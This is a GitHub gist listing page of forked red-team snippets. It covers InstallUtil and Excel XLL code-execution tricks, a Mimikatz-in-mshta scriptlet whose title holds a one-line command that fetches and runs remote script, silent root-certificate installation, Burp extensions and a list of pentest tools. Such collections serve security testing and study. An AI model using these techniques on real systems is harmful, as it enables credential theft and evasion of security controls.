Skip to content

Instantly share code, notes, and snippets.

View minkione's full-sized avatar

Anthony Bordel minkione

28 followers · 12 following
View GitHub Profile
@minkione
minkione / installUtil.cs
Last active November 27, 2017 11:28 — forked from Arno0x/installUtil.cs
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
/*
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs
===================================== USAGE =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll
*/
@minkione
minkione / getMoreDomains.py
Created December 27, 2017 10:50 — forked from milo2012/getMoreDomains.py
Get Domains Belonging to Organization from securitytrails.com
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
@minkione
minkione / my_ys1_notes.md
Created January 3, 2018 21:51 — forked from JamesHagerman/my_ys1_notes.md
Some useful YARD Stick One notes

Some useful YARD Stick One notes

This thing is a bit of a beast. People don't give it NEARLY the credit, or the documentation it deserves.

Two ways of using this thing: rfcat directly, or write a python script for it.

Basically, writing a python script is easier. Using rfcat directly is great but often, there are just too many silly settings to configure

@minkione
minkione / Readme.md
Created January 18, 2018 17:05 — forked from rxwx/Readme.md

Notes

An XLL file is basically a DLL with some special features to make it work with Excel.

See - https://msdn.microsoft.com/en-us/library/office/bb687911.aspx

By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.

The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.

@minkione
minkione / mimikatz.sct
Created January 18, 2018 17:08
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@minkione
minkione / lxc-kali.sh
Created January 23, 2018 12:07 — forked from nethunteros/lxc-kali.sh
Build Kali container in LXC
#!/bin/bash
##########################################################################################
# (right now the lxc bridge interface isn't working with this guide)
# (still had to install lxc over this)
# This is for my testing env for building a kali template for LXC
# You may need to install additional packages.
#
##########################################################################################
# Prereqs
@minkione
minkione / CSRFToken.py
Created January 26, 2018 08:26 — forked from thomaspatzke/CSRFToken.py
Burp extension: extract CSRF tokens from responses of selected Burp tools and update them with a custom session handling rule.
from burp import (IBurpExtender, IBurpExtenderCallbacks, ISessionHandlingAction, IHttpListener)
import re
class BurpExtender(IBurpExtender, ISessionHandlingAction, IHttpListener):
def registerExtenderCallbacks(self, callbacks):
self.callbacks = callbacks
self.helpers = callbacks.getHelpers()
callbacks.setExtensionName("Session CSRF Token Handling")
self.callbacks.registerSessionHandlingAction(self)
self.callbacks.registerHttpListener(self)
@minkione
minkione / Burp-CSRFRandomName.py
Created January 26, 2018 08:26 — forked from thomaspatzke/Burp-CSRFRandomName.py
Burp Session Handling Extension: CSRF tokens with random parameter names
from burp import (IBurpExtender, IBurpExtenderCallbacks, ISessionHandlingAction, IHttpListener)
import re
class BurpExtender(IBurpExtender, ISessionHandlingAction, IHttpListener):
def registerExtenderCallbacks(self, callbacks):
self.callbacks = callbacks
self.helpers = callbacks.getHelpers()
callbacks.setExtensionName("Handling of CSRF Tokens with Random Names")
self.callbacks.registerSessionHandlingAction(self)
self.callbacks.registerHttpListener(self)
@minkione
minkione / script.ps1
Created January 28, 2018 13:54
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
@minkione
minkione / pwnd.md
Created January 29, 2018 08:36 — forked from MattKetmo/pwnd.md
pwnd

Tools

  • Metaspoit: Penetration testing software
  • BeEF: The Browser Exploitation Framework
  • PTF: Penetration Testers Framework
  • Bettercap: MITM framework
  • Nessus: Vulnerability scanner
  • AutoNessus: Auto Nessus
  • BDFProxy: Patch Binaries via MITM (BackdoorFactory)
  • Xplico: Network Forensic Analysis Tool (eg. parse pcap file)